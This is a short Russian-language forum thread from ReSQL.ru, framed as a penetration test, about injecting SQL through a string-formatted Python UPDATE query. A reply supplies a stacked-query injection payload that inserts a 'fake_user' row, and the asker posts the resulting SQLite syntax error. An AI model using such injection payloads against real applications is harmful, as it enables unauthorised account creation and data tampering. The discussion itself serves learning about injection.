Не могу составить SQL запрос для Penetration test / Microsoft SQL Server

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / Microsoft SQL Server [игнор отключен] [закрыт для гостей] / Не могу составить SQL запрос для Penetration test

5 сообщений из 5, страница 1 из 1

Не могу составить SQL запрос для Penetration test

#39806524

Sergunka

Участник

Откуда: Bay Area, CA

Сообщения: 2 050

Рейтинг: 0 / 0

В общем есть приложение на питоне где исполняется простой SQL запрос

Код: python

database.execute("UPDATE users SET age={} WHERE username='{}';".format(age, username))

Есть огромное желание произвести вторжение через следующую комбинацию, если подставить через поле "age" следующее значение как это я (полный ламер в SQL) себе представляю

Код: sql

1.
2.
3.
4.

UPDATE users SET age=
( INSERT INTO users VALUES ("fake_user", "64762ccf8e701", "", 11); 
SELECT age from users WHERE username="terpila")
WHERE username="terpila"

В общем идея проста в поле SET попытаться протащить скрипт по созданию еще одно пользователя "fake_user".

Походу этого нельзя сделать, но всеж интересно было спросить... мало ли чего.

P.S. User "terpila"- уже есть в базе.
P.S.S. Disclaimer: Весь код и вторжения выдуманные и никак не связаны с реальными событиями.

...

Рейтинг:

0 / 0

25.04.2019, 21:48

| Ответить | Цитировать | Написать

Не могу составить SQL запрос для Penetration test

#39806530

alexeyvg

Участник

Откуда: Moscow

Сообщения: 26 926

Рейтинг: 0 / 0

SergunkaВ общем идея проста в поле SET попытаться протащить скрипт по созданию еще одно пользователя "fake_user".

Походу этого нельзя сделать, но всеж интересно было спросить... мало ли чего.А что тут сложного???
Если, конечно, age и/или username могут быть произвольными строками.
Например, если age присвоить строку

Код: sql

'age WHERE username = null insert users values(''fake_user'', ''64762ccf8e701'', '''', 11) UPDATE users SET age=age '

то выполнится:

Код: sql

1.
2.
3.
4.
5.

UPDATE users 
SET age=age 
WHERE username = null 
insert users values('fake_user', '64762ccf8e701', '', 11) 
UPDATE users SET age=age WHERE username='terpila'

...

Рейтинг:

0 / 0

25.04.2019, 22:18

| Ответить | Цитировать | Написать

Не могу составить SQL запрос для Penetration test

#39806536

Sergunka

Участник

Откуда: Bay Area, CA

Сообщения: 2 050

Рейтинг: 0 / 0

alexeyvg,

Спасибо огромное. Идея хорошая... но пока дает ошибку.

Код: html

1.
2.

Executing query UPDATE users SET age=age WHERE username = null insert users values(''fakeuser'', ''64762ccf8e701cf9a687c4b9eb4fa88d590a202ff538dcd7d8e9391f53f2df3e'', '''', 11) UPDATE users SET age=age WHERE username='terpila';
SQL Error Occurred: near "insert": syntax error

...

Рейтинг:

0 / 0

25.04.2019, 22:58

| Ответить | Цитировать | Написать

Не могу составить SQL запрос для Penetration test

#39806537

alexeyvg

Участник

Откуда: Moscow

Сообщения: 26 926

Рейтинг: 0 / 0

SergunkaСпасибо огромное. Идея хорошая... но пока дает ошибку.Так нужно просто вывести полученную строку, и её отладить.
Тем более, если у вас не MSSQL :-)
Может, я ещё зря одинарные кавычки удваивал, у вас же строка не в сиквеле, а в клиенте.

...

Рейтинг:

0 / 0

25.04.2019, 23:03

| Ответить | Цитировать | Написать

Не могу составить SQL запрос для Penetration test

#39806539

Sergunka

Участник

Откуда: Bay Area, CA

Сообщения: 2 050

Рейтинг: 0 / 0

alexeyvgSergunkaСпасибо огромное. Идея хорошая... но пока дает ошибку.Так нужно просто вывести полученную строку, и её отладить.
Тем более, если у вас не MSSQL :-)
Может, я ещё зря одинарные кавычки удваивал, у вас же строка не в сиквеле, а в клиенте.

Да, сейчас гляну какой синтаксис для Питоновской базы в памяти... спасибо за совет.

...

Рейтинг:

0 / 0

25.04.2019, 23:16

| Ответить | Цитировать | Написать

5 сообщений из 5, страница 1 из 1

Форумы / Microsoft SQL Server [игнор отключен] [закрыт для гостей] / Не могу составить SQL запрос для Penetration test

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=46&msg=39806530&tid=1687903]:	0ms
get settings:	7ms
get forum list:	19ms
check forum access:	3ms
check topic access:	3ms
track hit:	70ms
get topic data:	10ms
get forum data:	3ms
get page messages:	59ms
get tp. blocked users:	2ms
others:	238ms

total:	414ms